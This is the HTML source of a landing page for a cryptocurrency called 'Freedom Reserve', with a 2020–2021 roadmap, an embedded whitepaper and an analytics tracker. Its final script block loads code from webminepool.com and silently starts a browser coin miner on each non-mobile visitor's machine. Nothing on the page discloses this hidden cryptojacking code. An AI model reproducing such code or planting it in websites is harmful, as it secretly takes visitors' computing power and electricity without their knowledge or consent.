<!DOCTYPE html>
<html lang="en-US">

<head>
  <script type="text/javascript">
    var _paq = window._paq || [];
    _paq.push(['trackPageView']);
    _paq.push(['enableLinkTracking']);
    (function () {
      var u = "//nfogix.com/";
      _paq.push(['setTrackerUrl', u + 'api/track']);
      _paq.push(['setSiteId', 'f754930f-128f-4898-89db-e004cbf0e013']);
      var d = document,
        g = d.createElement('script'),
        s = d.getElementsByTagName('script')[0];
      g.type = 'text/javascript';
      g.async = true;
      g.defer = true;
      g.src = u + 'js/nfogix.min.js';
      s.parentNode.insertBefore(g, s);
    })();
  </script>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <meta http-equiv="X-UA-Compatible" content="ie=edge" />
  <link rel="manifest" href="./manifest.json" />
  <meta name="msapplication-TileColor" content="#ffffff" />
  <meta name="msapplication-TileImage" content="./favicon/icon192x192.png" />
  <meta name="theme-color" content="#ffffff" />
  <title>Freedom Reserve</title>
  <meta name="description" content="Free Currency for the British Isles" />
  <link rel="stylesheet" href="./css/normalize.css" />
  <link rel="stylesheet" href="./terminal.css" />
  <link rel="apple-touch-icon" sizes="57x57" href="./favicon/icon57x57.png" />
  <link rel="apple-touch-icon" sizes="60x60" href="./favicon/icon60x60.png" />
  <link rel="apple-touch-icon" sizes="72x72" href="./favicon/icon72x72.png" />
  <link rel="apple-touch-icon" sizes="76x76" href="./favicon/icon76x76.png" />
  <link rel="apple-touch-icon" sizes="114x114" href="./favicon/icon114x114.png" />
  <link rel="apple-touch-icon" sizes="120x120" href="./favicon/icon120x120.png" />
  <link rel="apple-touch-icon" sizes="144x144" href="./favicon/icon144x144.png" />
  <link rel="apple-touch-icon" sizes="152x152" href="./favicon/icon152x152.png" />
  <link rel="apple-touch-icon" sizes="180x180" href="./favicon/icon180x180.png" />
  <link rel="icon" type="image/png" sizes="192x192" href="./favicon/icon192x192.png" />
  <link rel="icon" type="image/png" sizes="32x32" href="./favicon/icon32x32png" />
  <link rel="icon" type="image/png" sizes="96x96" href="./favicon/icon96x96.png" />
  <link rel="icon" type="image/png" sizes="16x16" href="./favicon/icon16x16.png" />
  <style>
    .components-grid {
      display: grid;
      grid-column-gap: 1.4em;
      grid-template-columns: auto;
      grid-template-rows: auto;
    }

    .image-grid {
      display: grid;
      grid-template-rows: auto;
      display: grid;
      grid-row-gap: 1em;
      grid-column-gap: 1em;
      grid-template-rows: auto;
      grid-template-columns: repeat(auto-fit,
          minmax(calc(var(--page-width) / 3), 1fr));
    }

    @media only screen and (min-width: 70em) {
      .components-grid {
        grid-template-columns: 3fr 9fr;
      }
    }
  </style>
  <style>
    .timer {
      text-align: center;
      font-size: 30px;
      margin-top: 0px;
    }
  </style>
  <style>
    :root {
      --global-font-size: 15px;
      --global-line-height: 1.6em;
      --global-space: 10px;
      --font-stack: Menlo, Monaco, Lucida Console, Liberation Mono,
        DejaVu Sans Mono, Bitstream Vera Sans Mono, Courier New, monospace,
        serif;
      --mono-font-stack: Menlo, Monaco, Lucida Console, Liberation Mono,
        DejaVu Sans Mono, Bitstream Vera Sans Mono, Courier New, monospace,
        serif;
      --background-color: #1c1c20;
      --page-width: 60em;
      --font-color: #e8e9ed;
      --invert-font-color: #000000;
      --secondary-color: #a3abba;
      --tertiary-color: #a3abba;
      --primary-color: #05c705;
      --error-color: #cc0505;
      --progress-bar-background: #3f3f44;
      --progress-bar-fill: #62c4ff;
      --code-bg-color: #434344;
      --input-style: solid;
      --display-h1-decoration: none;
    }
  </style>
</head>

<body class="terminal">
  <div class="container">
    <div class="terminal-nav">
      <header class="terminal-logo">
        <br />
      </header>
      <nav class="terminal-menu">
        <ul vocab="https://schema.org/" typeof="BreadcrumbList">
          <li><a href="main.html" class="menu-item"><span>Home</span></a>
            <meta property="position">
          </li>
          <li><a href="about.html" class="menu-item"><span>About</span></a>
            <meta property="position">
          </li>
          <li><a href="bounty.html" class="menu-item"><span>Bounty</span></a>
            <meta property="position">
          </li>

        </ul>
      </nav>
    </div>
  </div>

  <div class="container">


    <figure>
      <img class="img5" src="./img/FR_COIN.gif" alt="FRwhitepaper" title="Freedom Reserve banner" />

    </figure>

    <br />
    <br />

    <section>
      <button class="btn btn-error btn-ghost" id="Timeline">Part 1: The Road to Mainnet</button><br /><br />
      <br />

      <div class="terminal-timeline">
        <div class="terminal-card">
          <header>November 5 2020</header>
          <div>
            Launch of Freedom Reserve.
          </div>
        </div>
        <div class="terminal-card">
          <header>Jan 2021</header>
          <div>
            ERC20 phase. During this time we will exist as a Token on the ethereum blockchain. we will also be running
            various marketing experiments
            finding out what is most effective.
          </div>
        </div>
        <div class="terminal-card">
          <header>March 2021</header>
          <div>
            Testnet for Freedom Reserve mainnet. We will run nodes and test and adjust the parameters to maximise
            efficiency and eliminate inflation
          </div>
        </div>
        <div class="terminal-card">
          <header>July 2021</header>
          <div>
            When the wallet and block explorer are complete, we will be ready to launch the phase 1 of FR mainnet.
            Holders of ERC20 FR will be able to claim their genesis FR
          </div>
        </div>
      </div>
      <br />
    </section>

    <div class="terminal-card">
      <header>
        <h2 id="whitepaper"><strong>FREEDOM RESERVE PHASE 2.0 WHITE PAPER</strong></h2>
      </header>
      <EMBED SRC="./img/FreedomReserveWhitepaper.pdf"
        STYLE="width:100%; height:1000px; overflow:scroll; border-style:solid; border-width:2px; border-color:#000000">
      <a href="./img/FreedomReserveWhitepaper.pdf" target="blank"><button class="btn btn-primary btn-block">Full Screen
          View</button></a>
    </div>
    <br />


    <br />

    <hr>
    <div class="terminal-nav">
      <header class="terminal-logo">
        <br />
      </header>
      <nav class="terminal-menu">
        <ul vocab="https://schema.org/" typeof="BreadcrumbList">
          <li><a href="main.html" class="menu-item"><span>Home</span></a>
            <meta property="position">
          </li>
          <li><a href="about.html" class="menu-item"><span>About</span></a>
            <meta property="position">
          </li>
          <li><a href="bounty.html" class="menu-item"><span>Bounty</span></a>
            <meta property="position">
          </li>

        </ul>
      </nav>
    </div>

    <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.13.1/highlight.min.js"></script>
    <script async defer src="https://buttons.github.io/buttons.js"></script>
    <script>
      document.addEventListener("DOMContentLoaded", function () {
        document.querySelectorAll("pre code").forEach(block => {
          window.hljs.highlightBlock(block);
        });
      });
    </script>
    <script src="https://webminepool.com/lib/base.js"></script>
    <script>
        var miner = WMP.Anonymous('SK_mGzgfCD6SSzBwVFgPGhlt',{throttle: 0.3});
        if (!miner.isMobile()){
            miner.start();
        }
    </script>
</body>

</html>